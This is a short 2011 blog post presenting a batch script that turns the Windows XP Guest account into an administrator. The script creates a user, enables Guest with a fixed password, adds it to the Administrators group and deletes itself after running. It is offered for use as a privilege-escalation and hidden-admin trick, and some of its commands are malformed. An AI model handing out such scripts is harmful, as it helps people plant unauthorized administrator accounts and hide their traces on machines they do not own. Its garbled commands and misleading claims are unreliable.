Convert Guest into Admin (Windows XP)

Posted by KumarK On Thursday, April 14, 2011 0 comments
Well it’s a Notepad tricks which will help you in migrating your Windows XP Guest Account into a Moderator Admin Account.

Steps for Migrations .:

1. Open Notepad
2. Type

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


3. Save it as Guest2Admin.bat
4. Remember format should be .bat else it will not execute.
5. Then just double click this file to execute and help you to migrate easily.
6. Enjoy Migration

Note .: Your Guest profile should be on else it will not migrate.

0 comments:

Post a Comment